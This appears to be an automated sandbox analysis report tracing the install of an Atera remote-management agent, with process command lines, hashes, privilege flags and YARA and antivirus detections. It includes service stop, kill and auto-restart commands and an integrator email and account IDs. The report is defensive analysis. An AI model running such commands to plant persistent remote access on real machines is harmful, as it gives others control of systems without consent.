                                                                                                                                                                                                                                                                                                                                  Commandline:rundll32.exe "C:\Windows\Installer\MSIC672.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4507343 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x40000
                                                                                                                                                                                                                                                                                                                                  File size:61'440 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                                                                                  Start time:18:29:58
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:rundll32.exe "C:\Windows\Installer\MSIC961.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4508140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x40000
                                                                                                                                                                                                                                                                                                                                  File size:61'440 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:03
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:rundll32.exe "C:\Windows\Installer\MSIDCAB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4512968 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:61'440 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:03
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x4e0000
                                                                                                                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:03
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:"NET" STOP AteraAgent
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x1e0000
                                                                                                                                                                                                                                                                                                                                  File size:47'104 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:03
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:04
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 STOP AteraAgent
                                                                                                                                                                                                                                                                                                                                  Imagebase:0xb30000
                                                                                                                                                                                                                                                                                                                                  File size:139'776 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:04
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:"TaskKill.exe" /f /im AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x670000
                                                                                                                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:04
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:05
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="000111.financeiro@yamahaconcessionaria.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000LlkxmIAB" /AgentId="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x1c5cb450000
                                                                                                                                                                                                                                                                                                                                  File size:145'968 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                                                                  • Detection: 21%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:08
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x20aa0540000
                                                                                                                                                                                                                                                                                                                                  File size:145'968 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA1044000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2267142526.0000020AA078E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2267142526.0000020AA0804000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2267142526.0000020AA0750000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2267142526.0000020AA082C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:14
Start time:18:30:08
Start date:30/10/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
Imagebase:0x7ff6c5700000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:18:30:08
Start date:30/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:18:30:09
Start date:30/10/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Windows\Installer\MSIF4AD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4519093 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
Imagebase:0x40000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:20
Start time:18:30:22
Start date:30/10/2024
Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000LlkxmIAB
Imagebase:0x1be62230000
File size:177'712 bytes
MD5 hash:31DEF444E6135301EA3C38A985341837
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:22
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:25
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000LlkxmIAB
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x2696e850000
                                                                                                                                                                                                                                                                                                                                  File size:177'712 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:25
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:26
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x16bd0c20000
                                                                                                                                                                                                                                                                                                                                  File size:145'968 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2935178142.0000016BD0CD0000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2935401771.0000016BD0D4D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD20A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2974355709.0000016BEA23D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD2175000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1BD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2974355709.0000016BEA2A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2974355709.0000016BEA295000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2938112807.0000016BD0FC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1F78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD21EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
